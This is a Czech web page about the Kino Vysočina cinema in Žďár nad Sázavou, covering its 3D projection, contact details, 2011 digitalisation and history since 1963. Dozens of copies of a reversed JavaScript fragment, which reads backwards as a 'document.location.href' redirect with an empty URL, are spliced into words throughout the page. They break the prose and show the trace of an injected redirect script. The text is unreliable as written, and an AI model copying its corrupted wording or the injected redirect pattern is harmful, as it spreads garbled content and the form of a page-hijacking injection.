Rainbow page separator

Program kina Vysočina


Převzato z dkzdar.cz

Kino Vysočina Žďár nad Sázavou

Kino Vysočina návštěvníkům nabízí kvalitní pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torový zvuk a ostrý obraz. 3D filmy jsou promítány s použitím pasivní technologie, návštěvník tak před vstupem do sálu obdrží speciální brýle. Po skončení promítání se brýle odevzdávají do boxů u východu a následně hygienicky ošetřují. Promítání filmů v 3D formátu je fenoménem dnešní doby a zážitek určitě s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí za [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. V aktuálním programu kina jsou filmy promítané v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to technologii vždy označeny jako 3D. Nenechte si tedy ujít zážitek z nové projekce a navštivte nás. Jste srdečně zváni.

Aktuální program kina Vysočina

Kontakty – kino Vysočina

Telefonní kontakt do Kina Vysočina je možný od čtvrtka do neděle vždy 1/2 hodiny před prvním představením do začátku posledního představení na telefonním čísle 564 407 559. V ostatní dny se prosím informujte na tel. 566 502 253

Adresa: KINO VYSOČINA, Brodská 1000/2, Žďár nad Sázavou, 591 01[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové stránky kina Vysočina“ href=“http://www.dkzdar.cz/node/232″>

Nové kino Vysočina

Projekt digitalizace kina proběhl v roce 2011 a umožňuje nově možnost promítání projekce ve 3D. Od [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to roku se můžete ve Žďáře nad Sázavou (ZR) těšit z nového 3D kina a celkového vylepšení technologie zvuku i obrazu. Díky novým technologiím je v kině také umožněn živý přenos různých představení. Ve vstupní hale se nachází Cafe bar „Biják“, kde se můžete před představením občerstvit.

Z his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie kina

Žďárský biograf slavnostně zahájil provoz 15. srpna 1963 promítáním širokoúhlého a barevného slovenského filmu Jánošík. Kino Vysočina postavily Pozemní stavby a stálo 4 miliony. Díky hledišti s 530 místy patřilo v době vzniku žďárské kino k nejmodernějším v republice. V prvních 10 letech navštívilo 9568 představení přes 2 miliony diváků. Promítlo se na 29 mil. filmových pásů. Vrcholná návštěvnost byla v r. 1971. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to roce navštívilo kino 220 tisíc diváků.
A kde se promítalo před výstavbou kina? Bylo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ve žďárské sokolovně a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v poněkud chudších podmínkách. Výstavba kina tedy byla pro tehdejší Žďár velkou kulturní událostí a návštěvnost [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu odpovídala. V roce 2011 prošlo kino již zmíněnou digitalizací a v roce 2014 provoz kina přešel pod správu města.

Kino Vysočina aktuálně

Přečtěte si na Žďárském průvodci co nového se kolem kina děje a neujde Vám žádná nová informace.

Odkaz na vyhledání novinek o kině: Kino Vysočina aktuálně